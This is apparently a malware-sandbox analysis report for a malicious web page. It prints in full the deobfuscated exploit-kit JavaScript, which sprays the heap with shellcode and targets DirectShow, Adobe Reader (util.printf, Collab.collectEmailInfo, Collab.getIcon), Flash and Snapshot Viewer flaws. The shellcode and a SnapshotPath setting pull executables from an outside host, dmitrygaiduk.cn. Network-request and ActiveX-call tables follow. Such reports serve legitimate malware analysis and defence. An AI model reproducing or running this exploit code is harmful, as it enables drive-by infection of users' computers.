185, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 176, 170, 140, 129, 148, 190, 188, 177, 109, 142, 144, 220, 177, 196, 117, 185, 202, 201, 174, 195, 206, 185, 175, 199, 202, 225, 180, 130, 110, 189, 206, 185, 225, 183, 129, 115, 109, 150, 124, 150, 138, 201, 169, 176, 147, 200, 210, 195, 155, 187, 186, 215, 190, 207, 196, 206, 172, 110, 140, 189, 210, 184, 193, 175, 186, 140, 129, 148, 128, 129, 112, 129, 201, 196, 208, 196, 199, 172, 180, 217, 131, 207, 190, 190, 192, 116, 198, 197, 221, 180, 200, 171, 137, 205, 190, 217, 179, 130, 182, 168, 207, 126, 168, 204, 189, 168, 186, 200, 189, 149, 180, 131, 194, 137, 212, 194, 221, 187, 191, 187, 171, 141, 126, 168, 193, 191, 187, 187, 215, 195, 168, 204, 215, 81, 175, 203, 125, 220, 177, 196, 132, 109, 192, 196, 207, 185, 191, 170, 186, 194, 124, 150, 202, 192, 182, 184, 141, 205, 141, 184, 200, 103, 179, 222, 184, 206, 193, 205, 112, 193, 212, 183, 215, 140, 200, 172, 189, 133, 150, 208, 195, 195, 189, 171, 189, 164, 207, 185, 191, 170, 186, 141, 124, 224, 189, 202, 189, 189, 147, 168, 219, 176, 202, 186, 174, 212, 201, 141, 165, 195, 172, 189, 202, 199, 141, 146, 201, 181, 186, 215, 196, 217, 125, 139, 110, 111, 160, 203, 206, 193, 122, 169, 187, 203, 146, 218, 200, 189, 168, 184, 216, 176, 229, 172, 149, 182, 168, 207, 131, 199, 190, 201, 180, 131, 149, 144, 220, 177, 196, 117, 153, 205, 196, 228, 157, 187, 189, 175, 204, 182, 225, 184, 201, 181, 136, 218, 201, 225, 190, 200, 186, 131, 203, 182, 217, 194, 191, 130, 181, 199, 191, 155, 144, 198, 179, 181, 220, 152, 220, 189, 206, 172, 190, 217, 162, 210, 189, 207, 132, 172, 198, 193, 224, 180, 149, 182, 168, 207, 131, 192, 189, 187, 183, 185, 205, 196, 225, 159, 187, 187, 174, 162, 124, 213, 195, 206, 183, 128, 148, 132, 209, 188, 195, 187, 184, 222, 188, 206, 184, 190, 188, 177, 147, 184, 219, 126, 188, 170, 178, 218, 204, 230, 132, 136, 172, 190, 202, 124, 168, 195, 204, 192, 193, 212, 183, 215, 125, 157, 182, 179, 213, 199, 210, 194, 205, 172, 170, 181, 182, 225, 183, 151, 169, 187, 203, 144, 220, 177, 196, 117, 150, 215, 190, 219, 195, 173, 181, 167, 213, 200, 213, 190, 206, 111, 111, 160, 203, 206, 193, 122, 186, 180, 213, 186, 217, 180, 199, 172, 180, 217, 146, 209, 190, 189, 188, 179, 202, 195, 225, 125, 189, 185, 171, 198, 201, 210, 148, 198, 172, 179, 202, 195, 225, 119, 129, 144, 140, 183, 150, 186, 148, 129, 112, 129, 216, 195, 221, 180, 198, 172, 179, 202, 195, 225, 125, 205, 172, 186, 166, 201, 225, 193, 195, 169, 187, 217, 186, 149, 118, 195, 171, 109, 145, 124, 224, 189, 187, 183, 175, 203, 199, 206, 188, 191, 110, 111, 160, 200, 219, 191, 191, 179, 171, 210, 186, 219, 195, 136, 186, 171, 217, 150, 225, 195, 204, 176, 168, 218, 201, 210, 119, 129, 186, 184, 200, 124, 153, 118, 198, 171, 167, 213, 143, 156, 126, 139, 121, 125, 147, 133, 155, 127, 136, 120, 109, 142, 144, 224, 189, 202, 172, 178, 202, 194, 210, 189, 206, 117, 185, 202, 201, 174, 195, 206, 185, 175, 199, 202, 225, 180, 130, 110, 189, 206, 185, 225, 183, 129, 115, 119, 142, 144, 224, 189, 202, 172, 178, 202, 194, 210, 189, 206, 117, 185, 202, 201, 174, 195, 206, 185, 175, 199, 202, 225, 180, 130, 110, 174, 202, 190, 212, 183, 206, 110, 114, 150, 126, 168, 194, 200, 183, 171, 209, 186, 218, 180, 200, 187, 116, 216, 186, 225, 144, 206, 187, 184, 206, 183, 226, 195, 191, 111, 109, 216, 201, 230, 187, 191, 110, 114, 140, 185, 214, 194, 202, 179, 167, 222, 143, 219, 190, 200, 172, 129, 140, 126, 168, 179, 201, 170, 187, 210, 186, 219, 195, 136, 169, 181, 201, 206, 155, 176, 202, 183, 171, 211, 185, 176, 183, 195, 179, 170, 141, 200, 219, 191, 191, 179, 171, 210, 186, 219, 195, 131, 130, 188, 198, 199, 141, 194, 200, 168, 182, 217, 190, 218, 180, 204, 132, 185, 202, 201, 182, 189, 206, 172, 184, 219, 182, 217, 119, 205, 181, 182, 206, 195, 225, 193, 208, 179, 110, 142, 129, 159, 127, 138, 119, 111, 160, 210, 208, 176, 206, 170, 174, 141, 186, 150, 202, 157, 182, 179, 213, 193, 210, 195, 191, 111, 111, 160, 199, 210, 195, 207, 185, 180, 160, 210, 234, 204, 100, 138, 181, 210, 197, 217, 180, 206, 172, 110, 142, 144, 223, 180, 206, 188, 184, 211, 144, 234, 89, 192, 188, 180, 200, 201, 214, 190, 200, 103, 185, 211, 197, 214, 189, 206, 185, 188, 209, 125, 150, 202, 195, 173, 110, 212, 183, 215, 125, 204, 172, 167, 201, 206, 192, 195, 187, 187, 171, 162, 146, 161, 120, 213, 170, 178, 202, 182, 223, 152, 200, 187, 171, 215, 203, 206, 187, 130, 186, 180, 198, 197, 225, 184, 199, 172, 184, 142, 144, 209, 190, 189, 188, 179, 202, 195, 225, 125, 193, 172, 186, 170, 193, 210, 188, 191, 181, 186, 167, 206, 182, 179, 130, 110, 185, 211, 182, 221, 184, 192, 185, 167, 210, 186, 148, 120, 136, 186, 184, 200, 146, 148, 111, 198, 171, 167, 213, 143, 156, 126, 139, 121, 125, 147, 133, 155, 127, 136, 120, 109, 160, 184, 217, 180, 187, 185, 143, 211, 201, 210, 193, 208, 168, 178, 141, 200, 219, 176, 202, 187, 175, 210, 186, 223, 120, 149, 196, 195, 111, 185, 214, 193, 191, 170, 186, 216, 189, 220, 198, 130, 112, 129];
- (repeated 1 time)
function CheckIP(){ var req = null; try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e){ try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ try { req = new XMLHttpRequest(); } catch (e){ } } } if (req == null)return false; req.open("GET", "/show.php?get_ajax=1&r=" + Math.random(), false); req.send(null); if (req.responseText == "1"){ return true; } else { return false; } } function Complete(){ setTimeout('location.href = "http://lib.ru/WEBMASTER/robots.txt"', 10000); } function directshow(){ var shellcode = unescape(" %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3 %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3 %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698 %u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455 %uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455 %u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856 %uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u6D64%u7469%u7972%u6167%u6469%u6B75 %u632E%u2F6E%u6762%u6D6A%u7170%u3279%u652E%u6578%u0000"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace)bigblock += bigblock; var fillblock = bigblock.substring(0, slackspace); var block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 0x30000){ block = block + block + fillblock; } var memory = new Array(); for (var i = 0; i < 300; i ++ ){ memory[i] = block + shellcode; } try { var obj = document.createElement('object'); document.body.appendChild(obj); obj.width = '1'; obj.height = '1'; obj.data = './dgn.ipg'; obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; setTimeout(pdf(), 500); } catch (e){ pdf(); } } function pdf(){ var isInstalled = false; if (navigator.plugins && navigator.plugins.length){ for (var x = 0; x < navigator.plugins.length; x ++ ){ if (navigator.plugins[x].description.indexOf('Adobe Acrobat') !=- 1){ isInstalled = true; break ; } if (navigator.plugins[x].description.indexOf('Adobe PDF') !=- 1){ isInstalled = true; break ; } } } else if (window.ActiveXObject){ var control = null; try { control = new ActiveXObject('AcroPDF.PDF'); } catch (e){ } if (!control){ try { control = new ActiveXObject('PDF.PdfCtrl'); } catch (e){ } } if (control){ isInstalled = true; } } if (isInstalled){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var dhxy = document.createElement('embed'); dhxy.setAttribute('src', './adhlorvy.pdf'); dhxy.setAttribute('href', './adhlorvy.pdf'); dhxy.setAttribute('type', 'application/pdf'); dhxy.setAttribute('width', 200); dhxy.setAttribute('height', 200); dhxy.setAttribute('style', 'display:none;'); document.body.appendChild(dhxy); } else { var dhxy = document.createElement('iframe'); dhxy.setAttribute('src', './adhlorvy.pdf'); dhxy.setAttribute('width', 200); dhxy.setAttribute('height', 200); dhxy.setAttribute('style', 'display:none;'); document.body.appendChild(dhxy); } setTimeout(flash(), 1500); return ; } flash(); return ; } function flash(){ var PlayerVersion = [0, 0, 0]; if (navigator.plugins && navigator.mimeTypes.length){ var x = navigator.plugins["Shockwave Flash"]; if (x && x.description){ PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace( /(\s+r|\s+b[0-9]+)/, ".").split("."); } } else { try { var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); if (fv != null){ PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(","); } } catch (e){ snapshot(); return ; } } var version1 = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0; var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0; var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0; if (version1 == 9 && version3 < 124){ var ua = navigator.userAgent.toLowerCase(); if (ua.indexOf("firefox") !=- 1){ var swfelement = document.createElement('embed'); document.body.appendChild(swfelement); swfelement.width = '1'; swfelement.height = '1'; swfelement.src = './manual.swf'; swfelement.type = 'application/x-shockwave-flash'; } else { var swfelement = document.createElement('iframe'); swfelement.setAttribute('src', './manual.swf'); swfelement.setAttribute('width', 200); swfelement.setAttribute('height', 200); swfelement.setAttribute('style', 'display:none;'); document.body.appendChild(swfelement); } } snapshot(); } function snapshot(){ var x; var obj; var mycars = new Array(); mycars[0] = 'c:/Program Files/Outlook Express/wab.exe'; mycars[1] = 'd:/Program Files/Outlook Express/wab.exe'; mycars[2] = 'e:/Program Files/Outlook Express/wab.exe'; try { var obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); } catch (e){ try { var obj = document.createElement('object'); obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'); obj.setAttribute('id', 'obj'); obj.setAttribute('width', '1'); obj.setAttribute('height', '1'); document.body.appendChild(obj); } catch (e){ Complete(); return ; } } if (obj = '[object]'){ for (xin mycars){ obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); var buf = mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = 'http://dmitrygaiduk.cn/bcluwy5.exe'; try { obj.CompressedPath = buf; obj.PrintSnapshot(); var snpelement = document.createElement('IFRAME'); snpelement.setAttribute('id', 'snapiframe'); snpelement.setAttribute('src', 'ldap://127.0.0.1'); snpelement.setAttribute('width', 1); snpelement.setAttribute('height', 1); snpelement.setAttribute('style', 'display:none;'); document.body.appendChild(snpelement); var snaptimer = setInterval(snpintrvl(), 2000); } catch (e){ Complete(); return ; } } } Complete(); return ; } function snpintrvl(){ if (obj.readyState == 4){ clearInterval(snaptimer); document.getElementById('snapiframe').src = ' ldap://127.0.0.1'; clearInterval(snaptimer); } } directshow();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u632F%u6B66%u3375%u652E%u6578%u0000"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u642F%u6866%u6E6A%u7877%u2E33%u7865%u0065"); var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u642F%u6D6B%u7370%u2E33%u7865%u0065"); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
- (repeated 1 time)
function fix_it(yarsp, len){ while (yarsp.length * 2 < len){ yarsp += yarsp; } yarsp = yarsp.substring(0, len / 2); return yarsp; } function util_printf(){ var payload = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u632F%u6B6A%u736F%u7775%u7978%u2E33%u7865%u0065"); var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload; var bigblock = unescape("%u0A0A%u0A0A"); var headersize = 20; var spray = headersize + heapblock.length; while (bigblock.length < spray){ bigblock += bigblock; } var fillblock = bigblock.substring(0, spray); var block = bigblock.substring(0, bigblock.length - spray); while (block.length + spray < 0x40000){ block = block + block + fillblock; } var mem_array = new Array(); for (var i = 0; i < 1400; i ++ ){ mem_array[i] = block + heapblock; } var num = 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 88888888888888888888888888; util.printf("%45000f", num); } function collab_email(){ var shellcode = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u682F%u736F%u7675%u7877%u337A%u652E%u6578%u0000"); var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C %u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D %u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B %u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF %uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303 %u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E %uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA %u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E %uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF %u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u642F%u696D%u7274%u6779 %u6961%u7564%u2E6B%u6E63%u692F%u6D6C%u7972%u2E33%u7865%u0065"); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." + tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
Writes
No writes.Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://dmitrygaiduk.cn/show.php?s=1893da9ce4 | 200 | text/html |
| about:blank | 200 | text/html |
| http://dmitrygaiduk.cn/adhlorvy.pdf | 200 | application/pdf |
| http://lib.ru/WEBMASTER/robots.txt | 200 | text/html |
Redirects
No redirects.ActiveX controls
-
0955AC62-BF2E-4CBA-A2B9-A63F772D46CF Name Value Count Attributes width 1
1 data ./dgn.ipg
1 height 1
1 -
AcroPDF.PDF No attribute setting or method call detected -
AcrobatJavaScript Name Arg0 Arg1 Count Methods Collab.getIcon N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 Collab.collectEmailInfo ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 util.printf %45000f
1.3E295
2 -
ShockwaveFlash.ShockwaveFlash.7 Name Arg0 Count Methods GetVariable $version
2 -
snpvw.Snapshot Viewer Control.1 Name Count Methods PrintSnapshot 2 Name Value Count Attributes ShowNavigationButtons false
2 Zoom 0.0
2 CompressedPath c:/Program Files/Outlook Express/wab.exe
2 AllowContextMenu false
2 SnapshotPath http://dmitrygaiduk.cn/bcluwy5.exe
2 -
clsid:ca8a9780-280d-11cf-a24d-444553540000 No attribute setting or method call detected
Shellcode and Malware
| Hexadecimal | ASCII |
|---|---|
